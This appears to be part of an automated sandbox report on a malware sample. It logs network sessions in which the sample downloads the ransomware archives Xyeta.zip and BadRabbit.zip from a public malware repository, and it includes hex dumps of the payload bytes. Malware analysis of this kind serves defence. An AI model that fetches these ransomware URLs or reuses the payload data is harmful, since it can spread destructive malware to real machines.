                                                                                                                                                    2022-09-29 12:59:02 UTC7540INData Raw: 84 cb 8c 8e 8f b5 22 07 b8 1e a5 b3 fd da 05 6e 5b 86 f3 81 9a cf 2c 2f 28 3f 2e 0a 6f be 8e 58 ad d2 19 19 b4 da ef a2 d4 88 0a 28 97 86 d5 49 41 af 4d 1f 29 ee ef 1e e5 c1 01 2a 53 44 bf 8c 40 c9 22 40 77 b4 0a 9b 98 0f 8a 4f 9c 76 76 3d 96 3c 0e a9 b3 11 11 ee 6b 5b 93 19 a9 a3 69 cf 55 f2 b1 bc e6 2c 22 c9 91 0d 8c dc ea 96 38 0d 22 a5 db 8d 3b f9 ec 3b ca e0 db b3 51 6d 44 56 a7 a3 af f4 4e 34 46 b2 9e fc dc ee 7d dd e2 a9 a0 6f 57 ec 3f 19 79 c8 9a db 3a ed 5d b3 13 e3 2c af d4 fc 5d 81 b9 78 71 9e e3 be 76 46 c0 e0 0e 14 60 72 3b b9 d0 c8 43 02 59 a8 4a 1f 7d ae bd 6f ed b2 3f a7 f7 fb b8 ae be 62 ab 64 8d 61 7e 4b 57 5c 75 dc b3 ea 4d 37 7c 85 ce 1c 06 17 e4 2f 6a 40 11 05 ad 17 0a 5c f5 3c 53 67 5e 38 72 e1 62 78 8c ef 82 56 11 13 20 45 78 a5 6e
                                                                                                                                                    Data Ascii: "n[,/(?.oX(IAM)*SD@"@wOvv=<k[iU,"8";;QmDVN4F}oW?y:],]xqvF`r;CYJ}o?bda~KW\uM7|/j@\<Sg^8rbxV Exn
                                                                                                                                                    2022-09-29 12:59:02 UTC7556INData Raw: bd 62 8c 68 db dd b2 ae 5e d5 91 19 cb f3 dc b4 e8 c9 b8 dd bc a8 d1 d7 06 3c dd e6 eb b8 dc 17 cf ea a9 a4 f9 ee 95 63 24 b3 d3 90 76 09 13 9d 00 0b bc 7b 72 16 ee cb 12 6f b3 85 cc aa f4 0b 1c e1 7f 4f 09 35 a3 c8 8c f2 3b 29 92 2a a9 35 07 3c 0f f6 0c 90 c2 30 03 3e 47 56 7d a9 15 b3 ae aa fc 64 ce e7 60 0b b9 e9 32 15 ce 08 43 a3 e5 7d e1 25 b0 1b 71 45 92 cc a0 e2 ab e9 48 e8 df 5a bf 2b 9f 08 eb c5 e6 b0 e3 c9 5e 7a 2c e8 94 f7 5e a5 69 08 f3 bf af c3 1e 52 67 32 a2 0a e0 1a b5 c5 84 68 08 d6 42 80 d2 37 38 f3 4b 99 22 b2 0d 33 f5 b7 52 b7 4f 46 43 6b b6 6b 11 db 25 2e c9 b9 2c af da 63 e4 f8 bf 84 b1 4f 58 aa be ea 59 b6 14 6d 5d dc eb 3b 00 01 dc 19 83 c1 40 df 40 29 ef 5c e9 3f 8d 25 31 fe 1e c4 36 75 ab e8 e8 d0 8a 89 fa 0d 28 e4 60 13 bb 73 a7
                                                                                                                                                    Data Ascii: bh^<c$v{roO5;)*5<0>GV}d`2C}%qEHZ+^z,^iRg2hB78K"3ROFCkk%.,cOXYm];@@)\?%16u(`s
                                                                                                                                                    2022-09-29 12:59:02 UTC7560INData Raw: c2 c6 8c a0 39 84 05 9d 37 41 23 56 89 71 8a b6 1e 76 52 d2 7a 32 34 3b 9f d7 a0 93 fe 20 ef 34 a7 cd dc 81 2c aa ae 00 6b 5f 32 52 ed 53 78 d4 be 55 86 f3 5e f3 a9 4f bb 63 a4 f6 c1 00 ce 8d 98 ca 21 71 aa 60 f9 bb 38 44 8c 97 5e 63 fb 9f 3e 0f 22 62 30 11 79 b8 37 40 8c c3 a4 56 f4 54 15 45 8f 25 9b 85 87 2e 17 63 4c 76 16 39 ba 1b 6c 62 0e 67 71 66 9a 6e 78 68 28 97 95 8d f7 c0 fd 49 e4 54 1c 90 1e df ba e6 7f 6a 15 fe 91 eb 3f e1 62 7f 29 52 11 58 3e bb 1a 47 bb 5e 56 e8 35 9d 1c e5 1c fb 26 cd f2 25 af b4 83 de a0 db e9 46 14 fa 64 09 22 ea c9 af 36 b8 f8 b2 e6 f9 01 0b e1 19 c1 95 c1 f8 27 c6 a8 5b f4 66 66 e0 d8 1c 39 bb dc 26 63 6a c0 0b 7d c8 76 cf 65 e6 34 25 53 ff bb f6 0f b0 cd 82 fa 76 db eb 96 bc 19 78 c8 6a b1 cd 88 d8 0c 1f cc 34 c7 93 47
                                                                                                                                                    Data Ascii: 97A#VqvRz24; 4,k_2RSxU^Oc!q`8D^c>"b0y7@VTE%.cLv9lbgqfnxh(ITj?b)RX>G^V5&%Fd"6'[ff9&cj}ve4%Svxj4G
                                                                                                                                                    2022-09-29 12:59:02 UTC7576INData Raw: 5b ba 1f 98 c0 ec 9c 30 1d 17 26 c3 6a 97 b4 84 f1 6d 91 11 e8 a1 74 ef ea f1 da d7 ff 6b 80 af 7c 94 74 bc 02 dd 9f de fa b2 d4 5c 77 3e 5c f4 03 3e 3a 04 8c 79 63 fd 9f ee f4 36 19 58 66 61 0c 22 b6 f6 bd d0 ed 9e 9d af cb 7a 83 1b f0 92 97 c0 14 7b ce 9c 11 fc 23 3b 13 82 4c 63 77 7d e8 db fe d8 56 a4 cb 45 21 38 fb 7e dc c4 57 3c 66 53 04 ef 79 5b 38 d8 ef d8 9f e4 33 1d 4d 90 99 78 36 19 4d c3 29 2b 46 81 f0 b0 82 8d 1a 62 6d 73 58 0f 3e 21 42 d5 a9 23 02 cf 6e 21 61 8d 7a 8b 11 1f 0a 52 55 36 eb 3d e8 fd 5a 4f b3 54 7d 55 67 4b 6e f2 e3 05 72 f7 a0 e7 2d 3c 31 45 3e 78 d7 96 d6 ce 78 a6 1e d7 db a7 11 9f ef c0 e3 3f 96 82 63 a3 18 99 9a a9 4b d0 c1 59 56 e9 7c 70 05 dc 3c 17 95 8a 76 59 7b ab 3c 83 91 9d 23 15 7d 54 0d 38 35 12 73 e8 32 0b 5d 8c 91
                                                                                                                                                    Data Ascii: [0&jmtk|t\w>\>:yc6Xfa"z{#;Lcw}VE!8~W<fSy[83Mx6M)+FbmsX>!B#n!azRU6=ZOT}UgKnr-<1E>xx?cKYV|p<vY{<#}T85s2]
                                                                                                                                                    2022-09-29 12:59:02 UTC7592INData Raw: b1 d3 a4 17 13 d7 7f 1e a9 40 00 40 c5 a8 6b 20 b9 89 d4 9e ca f4 db 29 a5 72 43 38 9f 22 51 b2 14 fe 22 2d 80 7f 4d 3b fb 0a 1f 9b 7f ad 92 74 ea 28 f0 c6 55 a3 b1 e4 d5 3b 31 58 f1 40 bc be f6 da e6 ce f8 6a b8 e6 f7 41 09 ec 4c f5 9e 48 56 4e a3 97 c3 0d 59 11 fe 2b b3 08 99 68 52 87 b5 9f d0 7f 05 89 a8 c4 36 6c c8 92 ad 71 24 b4 97 7b c0 a5 51 f2 27 2f 8a 39 7c 64 5c c2 f9 ca 0f ea c0 3a 4a 63 b2 97 ae 59 58 15 4a f7 b3 1d 30 0d 99 d7 88 0e 30 d3 a2 45 79 70 d1 fa 70 d4 8a c0 00 7b 1a 0a 80 83 28 de 1e 49 93 46 84 14 77 f1 e2 11 82 d4 5a 69 2d dd f2 ce 46 5b b2 cc 54 02 85 9c fd 47 2f 38 44 26 c8 d2 07 b6 6b e9 36 7a 09 f7 91 9e da 55 ba 0c 01 f9 9d b5 c0 f9 7c f8 52 ba 07 f9 f5 d8 de 95 9f 19 2f e8 3c d3 31 78 dd c0 95 c6 2c 04 c2 9b bd 1e cf 6e e8
                                                                                                                                                    Data Ascii: @@k )rC8"Q"-M;t(U;1X@jALHVNY+hR6lq${Q'/9|d\:JcYXJ00Eypp{(IFwZi-F[TG/8D&k6zU|R/<1x,n
                                                                                                                                                    2022-09-29 12:59:02 UTC7608INData Raw: c3 67 f8 4f 6b c8 a6 63 22 5f 50 7e 42 46 11 6b df 06 22 09 a7 d7 1e b2 59 37 3f a7 20 75 e5 73 13 57 c7 d8 b4 4a 3f d8 0b 87 3d e9 9b 86 63 01 3b 8b 91 eb 94 71 a6 b4 24 10 4e ef 44 44 f6 ec 2a 93 2b e7 be d2 6b 42 b7 dd d1 0a 55 54 2b 6a 18 9a c0 cb be 7a 9e a6 2d 01 70 0d 38 c2 e7 32 75 04 88 b5 df 98 53 60 17 df 7e b6 68 a0 c9 77 28 2b ee 31 2b 81 30 2d 11 f4 1c c0 86 ea b0 8d 0d 01 e9 2c 71 26 b7 4b 47 54 e7 05 1e 7c f4 dd 02 d0 75 ce fb 21 7d e1 c0 a9 1e a5 85 6e 7b 64 14 8f e8 fe 40 20 92 46 cc 99 b6 37 86 83 94 ab a0 a7 96 3e 41 eb 26 97 96 37 b9 6c 3e 57 06 1b de 45 04 e4 b6 f8 75 28 8c ae 0b e4 bf cf b7 f0 37 5b 21 49 5d e2 aa fb 11 8e 31 15 d4 a2 5a 30 63 67 e4 e0 70 41 fc 18 7f 9d 2a d6 bd 8d 74 dd 8e 44 b0 d8 ba 9e 2f ab 38 32 ac 3e 70 1a 37
                                                                                                                                                    Data Ascii: gOkc"_P~BFk"Y7? usWJ?=c;q$NDD*+kBUT+jz-p82uS`~hw(+1+0-,q&KGT|u!}n{d@ F7>A&7l>WEu(7[!I]1Z0cgpA*tD/82>p7
                                                                                                                                                    2022-09-29 12:59:02 UTC7624INData Raw: ae 06 81 72 d6 c1 87 dd 96 3f fe b1 3b b5 81 84 cf 41 75 02 81 d5 11 c2 4f 10 bc 7b eb fe 83 90 71 9d b4 32 8f 0a 0b d7 ca 60 29 df f7 19 82 11 93 79 70 82 cc 71 52 d8 58 3f 05 9d d5 f2 0c 3f 33 45 5d 03 9c ef da bb 4d ee 6b 40 54 34 cc cd db e2 48 41 cf 98 14 d2 59 58 a5 a8 6d ac b5 1e 5c 42 51 06 8a 39 e5 51 8b 26 82 ed fe 94 2c 06 02 38 ef f0 31 70 a8 b3 63 52 1b 83 92 f9 e7 13 f3 b6 58 c1 c7 0f 92 cf 4f a8 40 27 b1 c0 f9 fc 51 74 d9 c7 6c 19 db ed 8c 59 b5 54 92 17 ce 6f 7e fa e8 d6 2a 0e 18 26 6e 05 32 c9 f9 06 fb c3 43 df 75 ae 45 b5 ce 94 24 cd af 97 40 63 fc e4 84 00 f2 b4 f7 8d bb 8a 40 fd 80 f6 37 48 3b b7 4c e7 b7 be f3 04 fe 5d 16 db 1e d3 a4 9d 1e 57 ff 31 9b 3d e6 a3 66 9f 89 22 de 1d c6 e2 26 6d a5 33 04 9a 13 b8 6c a2 f6 b7 37 b7 41 0a ed
                                                                                                                                                    Data Ascii: r?;AuO{q2`)ypqRX??3E]Mk@T4HAYXm\BQ9Q&,81pcRXO@'QtlYTo~*&n2CuE$@c@7H;L]W1=f"&m3l7A
                                                                                                                                                    2022-09-29 12:59:02 UTC7640INData Raw: 8e a8 fd a5 09 48 1e c0 6f cc a8 35 57 57 6d 77 53 18 40 f9 07 66 8a 4f 8c ff b4 4c 43 b7 97 b8 23 43 40 ed de c8 ea 3d 5c d2 e8 91 af 98 fe b8 1b cc 3a 90 96 24 9a e9 0e c8 a1 e3 bd 3a 16 3e dd dd ec 1c 9b f7 dd 5a 67 3c 61 8a 98 99 a8 04 11 0e 89 49 7b 27 51 c1 7f 02 60 38 3b 78 00 15 c5 92 52 03 e7 e8 91 97 38 b8 c7 bc 9e 1b e3 f2 84 e1 a3 2d 7b ca df e7 1b 5d be 87 3f 0c 5d 9a 3a be 39 ad a0 c7 03 31 b1 0b 63 93 fe cf be 43 de a4 ab d6 88 ea e6 57 35 79 05 7b 7d df 6f c1 f2 81 d2 28 c0 d6 36 46 d2 0d f3 ec b9 02 c5 e7 ea da dc 9e 47 04 fb ef c3 2b 5a ad 5f d2 49 eb 04 bb c0 25 08 55 bd 39 c4 c2 a8 b1 b2 43 0b 3d 66 8d a8 5a 0b 03 3c 1f c0 f7 b3 1d 56 40 26 e2 4b c2 f9 8e e5 4f 5f dd 46 ff 68 9e 96 49 ca b8 ff 08 97 6e 60 d6 94 4d 1f d2 e5 0f 79 de 26
                                                                                                                                                    Data Ascii: Ho5WWmwS@fOLC#C@=\:$:>Zg<aI{'Q`8;xR8-{]?]:91cCW5y{}o(6FG+Z_I%U9C=fZ<V@&KO_FhIn`My&
                                                                                                                                                    2022-09-29 12:59:02 UTC7656INData Raw: f8 bf ec 63 1c 21 6f 94 54 96 9f 9d f1 2c 13 99 81 6e d0 1b ee e1 44 f2 c9 68 b1 8b 35 0b 19 73 be d2 f7 4e 86 5d 94 5b 6e ff 53 ee 1a e4 aa 63 ba 7e 17 a8 68 90 6a 36 0d 3c a3 ae b0 c3 b4 26 59 a6 84 c5 6e 2b da 5a 65 1e 99 d6 e4 a6 dd 89 35 2d 86 9e 56 08 7d a3 a8 9e c8 a7 8d f1 2f f1 e6 c5 20 93 c4 5c 1c 21 8f 4d 86 50 fb dd a6 67 b4 fb 70 dd 0b 45 a7 a8 11 8e 25 ba 74 8c 13 89 96 e2 8d c9 92 01 27 f5 fc 81 78 79 22 b2 93 39 64 91 87 d9 4a d7 29 94 cf de f4 c8 c3 cf 84 d9 53 41 01 ee 64 df 12 c6 0b 32 6c 25 10 5e 79 1e f0 6a ff c9 1e 4a e1 a1 bd db 3f 6b a6 bd 55 0c 68 bc 62 c0 8a a7 fd 82 19 83 a1 f9 46 72 0f ad 57 9e 15 69 ae b4 52 98 de 0c 84 bf 28 09 ef 4a 89 39 84 e0 d4 e7 95 6b 45 0c 1e 36 54 34 28 d3 eb e0 9e b4 1a a3 a4 37 2d 3d 48 d9 9a 7e 65
                                                                                                                                                    Data Ascii: c!oT,nDh5sN][nSc~hj6<&Yn+Ze5-V}/ \!MPgpE%t'xy"9dJ)SAd2l%^yjJ?kUhbFrWiR(J9kE6T4(7-=H~e
                                                                                                                                                    2022-09-29 12:59:02 UTC7672INData Raw: ba a4 c1 af 0b 45 60 57 d8 e4 c4 24 38 3b 61 04 de d1 51 cb 28 c2 b0 48 5e d6 e1 ae c9 69 81 28 72 9d 1f f5 33 07 b8 53 ae 2c 63 c5 51 bd d3 6b ce 5d 0f 98 6b b1 d7 41 59 92 f1 c9 9c 4b f1 9d 30 2a 5b 17 52 1a 70 4e 12 b2 97 ce 7b fb 96 86 ba 43 20 c8 d9 74 83 e1 6f 2c 4e 4e eb 64 e4 e7 d8 76 89 81 78 2a 7c d1 bf c8 cc e1 6c 76 5a 77 a9 75 99 60 00 a9 9f c0 fd 42 97 31 7e 7e a6 c2 77 cc ce ec 0c e7 1e c1 a1 5b be 79 f5 bf 29 dc 5f c1 0d c1 24 52 f9 80 f2 84 6f 91 15 36 16 f4 f9 16 d1 cd 7e 9d 09 4c 31 37 3b da 56 c6 44 9d cd 5b bd 39 7e 67 31 9b 97 b9 37 fc 3a 3d 1c 0d 2c 25 dc 34 dc 0e a0 db 52 88 b4 91 70 00 81 12 29 3f 13 f8 a7 18 d2 48 b2 db 1b 7d 7d 56 d3 b9 97 5c d9 f6 ff c2 51 da 9a f1 25 a8 c9 0a 55 f2 e2 3f a9 14 18 32 be 90 9f c4 3c d2 af 1f fc
                                                                                                                                                    Data Ascii: E`W$8;aQ(H^i(r3S,cQk]kAYK0*[RpN{C to,NNdvx*|lvZwu`B1~~w[y)_$Ro6~L17;VD[9~g17:=,%4Rp)?H}}V\Q%U?2<
                                                                                                                                                    2022-09-29 12:59:02 UTC7688INData Raw: d0 73 f0 9a b0 50 78 9c 79 91 d3 d4 fb cb b2 26 f2 63 66 c1 74 9f 5b 47 e9 e1 38 f8 01 45 4c 19 2e 53 3e dc 02 58 a3 88 c6 7e a3 17 3d c3 57 3d e0 3e 46 b1 2a 54 56 76 3a 66 08 81 33 0d e0 af e3 b4 c4 d9 f8 12 fd 25 76 a9 ee 0b 5d cf 01 6d 9c d1 22 53 1e e3 25 92 7d 90 4a 01 67 17 9b 73 94 11 0a f4 23 c8 d0 4f e9 fa f0 ba 32 af 1d 94 73 c9 b7 c0 84 67 ac bf 41 71 23 fe 42 d7 92 8c e6 7d 58 c1 7a 43 c8 85 be 9e ff 67 2e 83 43 7b 75 79 4c 0b ea 8f 62 c2 fe 09 98 93 64 2d b1 11 36 79 27 0f ab f4 2c 32 29 7e e3 6d 44 39 19 03 9e af 6e a2 c2 14 db 1a 45 9c 6d e9 dd c5 b9 54 51 85 4b fd 1a e1 8b ba bc 2c 61 5f ba 41 26 a1 77 7c 89 58 79 74 a6 98 02 ae 97 d1 2d 6c 37 e3 86 90 63 d2 36 63 28 42 c9 e5 3e 3a 9c e4 ef 73 56 36 0e 15 b0 1b e5 83 01 a8 f4 be 3d b1 3a
                                                                                                                                                    Data Ascii: sPxy&cft[G8EL.S>X~=W=>F*TVv:f3%v]m"S%}Jgs#O2sgAq#B}XzCg.C{uyLbd-6y',2)~mD9nEmTQK,a_A&w|Xyt-l7c6c(B>:sV6=:
                                                                                                                                                    2022-09-29 12:59:02 UTC7704INData Raw: bd e1 ba 8d ac 45 6b 98 3b 9c 5d 5a d9 b2 7d 80 48 2a 97 3e e9 e2 5f ca 24 77 0e 25 cf 99 ed c9 b6 36 59 7c 93 ec 00 cc b3 a3 89 68 c2 1b 24 16 60 d0 5e b7 57 16 fe b4 a5 8c c7 64 4b 11 4d bb ad cd df 45 d0 62 b4 bd 40 a8 8d b2 c1 2a b0 8d d7 59 c5 94 c1 41 6e 3d 1b 45 1e 4b 2f 6c 26 7f ad 69 25 e5 5e 51 f0 58 5d da 3e ff f9 58 8d 86 42 4e f7 c4 4f cf 98 74 38 a3 38 82 32 49 6f 04 d7 93 25 f9 5d bd 56 d3 47 38 4b 73 9c 24 92 7d 50 4f 2f 00 1a b4 98 38 b7 db 3c ed 86 3a b7 ac 6b b7 d6 22 cd dd fe f8 de a0 2e f9 1b 1a 59 89 9f 01 5f f9 e5 25 67 c5 01 86 c8 a8 36 a4 48 f8 a4 56 13 32 81 5a 06 83 f3 42 a5 42 9e f3 28 1e c0 1d c4 a0 00 57 39 fe 93 cb c7 76 45 5c 2c 96 8c 0e f0 a0 fe 33 9d 7b 70 f4 0e 5a 3a 1a 8d 9e 8c 08 25 1b 3d 93 ab d5 d4 0b b1 87 68 6c c0
                                                                                                                                                    Data Ascii: Ek;]Z}H*>_$w%6Y|h$`^WdKMEb@*YAn=EK/l&i%^QX]>XBNOt882Io%]VG8Ks$}PO/8<:k".Y_%g6HV2ZBB(W9vE\,3{pZ:%=hl


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    57192.168.2.349736140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:03 UTC7709OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    58140.82.121.3443192.168.2.349736C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:03 UTC7709INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:03 UTC7710INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    59192.168.2.349737185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:03 UTC7711OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    6140.82.121.3443192.168.2.349710C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:47 UTC189INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:01 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:47 UTC190INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    60185.199.108.133443192.168.2.349737C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:03 UTC7711INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 77102
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "3aa8e4e319c7c273c5d9fc9071b3c14c66404cc71f0c3bd72a0137f90c54bbe3"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: BC80:0543:E4C491:F3028B:6335934D
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:03 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6967-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456344.665115,VS0,VE153
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 19fd3c6bdeb2510b87abea8d26d922460e20d958
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:03 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:03 UTC7712INData Raw: 50 4b 03 04 14 00 01 00 08 00 3b 0c 3d 3e 89 23 ff 7d 80 2c 01 00 00 50 01 00 14 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 58 79 65 74 61 2e 65 78 65 e0 56 04 74 2a 4a 9d b0 12 3a 4b 00 4a 15 97 da eb db 90 28 9e 54 ae ce 0c 86 03 d2 18 7f a9 7a 76 ec 1d b8 f3 06 2b 6a 51 00 b5 73 d8 81 6c 15 ae 27 4f 5a 02 f3 35 ad 61 07 63 7d 2e 8e 3e f1 f3 2b 88 4d e4 5c 81 c5 e4 b7 17 43 2c 63 ab 0f c5 a0 45 17 4c 36 40 6d 6c a0 44 f5 2f 82 26 57 0e b1 66 5e bd c6 8b 13 60 9e 97 dc 8a 06 8b 1f fa 02 54 b6 25 08 75 90 c3 c0 98 58 ae 9e d6 1e c7 c4 25 e8 17 46 ff a0 69 e6 e7 16 27 10 46 8b 84 04 12 ca 52 2d 8c 38 bf 39 66 3a d3 ec fe ff ee 80 c3 64 f1 c7 e2 47 64 d1 42 02 f1 2f de a4 13 00 26 67 12 63 bb 54 97 c0 50 23 d8 5d a0 3e 77 7f 89 26 53 5c 7f 69 13 62 13 98 e6
                                                                                                                                                    Data Ascii: PK;=>#},PEndermanch@Xyeta.exeVt*J:KJ(Tzv+jQsl'OZ5ac}.>+M\C,cEL6@mlD/&Wf^`T%uX%Fi'FR-89f:dGdB/&gcTP#]>w&S\ib
                                                                                                                                                    2022-09-29 12:59:03 UTC7728INData Raw: 96 2d 85 69 8a 19 f4 01 31 ad 1c 30 8d be 07 bd 6b c6 18 36 2e 31 13 e8 15 d4 0d f5 84 08 71 4a 32 a8 6b 66 0e 61 79 ab 23 40 88 7b 48 58 4b 05 6f 0a 8c 0f bc b2 22 72 0b bc 3a ff 5b 52 bb 5e 18 3a ba d5 10 23 14 d7 ba c0 9d 22 c0 d7 24 28 6a 72 78 04 8c ac 0c 7b 77 ce 2c 1e a9 2b 8e 21 19 45 b6 5d 5e bf ab ca d4 3e fc 3e b6 b8 a1 fa fa 0e bd 81 5d 27 01 3d 38 57 9f 5e c4 d4 d8 fe 02 85 2d fc 30 5d 45 c6 8e f7 3b 53 d6 f6 78 5f 10 2c 92 89 6d a3 37 d1 8d e1 81 8a 51 92 d4 36 b2 87 ad f9 7b cb 81 dd ba 23 9a 8d 91 c8 c9 c9 c2 27 48 9d c3 39 7e 8d 29 6b 1f 2f 79 2b 34 32 d8 8e b3 34 f0 ce c6 f4 f2 64 66 fc 32 8a 85 59 bb c8 dc cd de 47 b2 7f 5d 38 7e 7b 37 07 60 27 c5 e0 91 2c b6 8d b2 b6 b3 ce 6e 18 91 56 88 c6 1f 39 a4 9b 5c a6 ca c1 21 93 c7 ac b7 59 6f
                                                                                                                                                    Data Ascii: -i10k6.1qJ2kfay#@{HXKo"r:[R^:#"$(jrx{w,+!E]^>>]'=8W^-0]E;Sx_,m7Q6{#'H9~)k/y+424df2YG]8~{7`',nV9\!Yo
